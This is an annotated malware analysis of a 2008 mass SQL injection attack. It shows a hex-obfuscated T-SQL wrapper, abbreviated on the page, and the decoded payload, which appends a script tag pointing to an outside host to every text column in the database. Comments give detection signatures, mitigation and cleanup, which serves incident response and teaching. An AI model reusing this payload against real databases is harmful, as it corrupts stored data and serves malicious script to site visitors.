HACKED 2008-08

http://www.trustedsource.org/blog/142/New-SQL-Injection-Attack-Infecting-Machines
http://it.slashdot.org/article.pl?sid=08/08/12/1943217

-- Captured wrapper statement (T-SQL), described in the linked write-ups as
-- delivered through SQL injection.
-- The real payload is carried as a hex literal, CAST back to character data
-- and run through EXEC, so no SQL keyword of the payload appears in clear
-- text inside the injected string.
-- The literal is abbreviated on this page (the "…" marks the cut). Its
-- visible prefix decodes to "DECLARE @T v" and its visible tail to "ursor",
-- which is consistent with the decoded listing that follows.
-- Detection: a request parameter that combines "CAST(0x" with "EXEC(" is a
-- strong signature to search for in web-server and WAF logs.
-- Mitigation: parameterized queries stop the wrapper from ever reaching the
-- database engine as executable SQL.
DECLARE @S CHAR(4000);
SET @S=CAST(0x4445434C41524520405420766  …  37572736F72 AS CHAR(4000));
EXEC(@S);

-- Decoded form of the payload, kept exactly as captured for analysis.
-- NOTE(review): the page rendering appears to have replaced straight quotes
-- and "--" with typographic characters, so the text is a specimen rather
-- than valid T-SQL as shown.
-- @T receives a table name and @C a column name on each cursor fetch.
DECLARE @T varchar(255)
,@C varchar(4000)
-- The cursor enumerates (table, column) pairs from the system catalog:
-- sysobjects.xtype 'u' selects user tables, and syscolumns.xtype
-- 99 / 35 / 231 / 167 select ntext / text / nvarchar / varchar columns,
-- i.e. every text-bearing column the connecting login can see.
-- Defensive point: a web application login rarely needs to read these
-- catalog tables or hold UPDATE rights on every table.
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype=’u’ and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
-- Loop over every pair returned; @@FETCH_STATUS = 0 means the fetch succeeded.
FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
-- For each pair a dynamic UPDATE appends an HTML fragment to the column
-- value. The fragment closes an attribute and a <title> element, references
-- an external script, then opens an HTML comment so that any trailing markup
-- is hidden. The "not like" filter skips rows that already hold the fragment.
-- Impact: any page that renders these columns without HTML-encoding serves
-- the external script to its visitors (stored content injection).
 BEGIN exec(‘update [‘+@T+’] set [‘+@C+’]=[‘+@C+’]+””></title>
<script src=”http://sdo.1000mg.cn/csrss/w.js”></script><!–”
where ‘+@C+’ not like ”%”></title>
<script src=”http://sdo.1000mg.cn/csrss/w.js”></script><!–”’)
-- Advance to the next (table, column) pair.
-- Response: the script host in the fragment above serves as an indicator when
-- searching stored data and proxy logs. Cleanup means removing the appended
-- fragment from every affected column, or restoring from a backup taken
-- before the compromise.
FETCH NEXT FROM  Table_Cursor INTO @T,@C END
-- Release the cursor once all pairs have been processed.
CLOSE Table_Cursor
DEALLOCATE Table_Cursor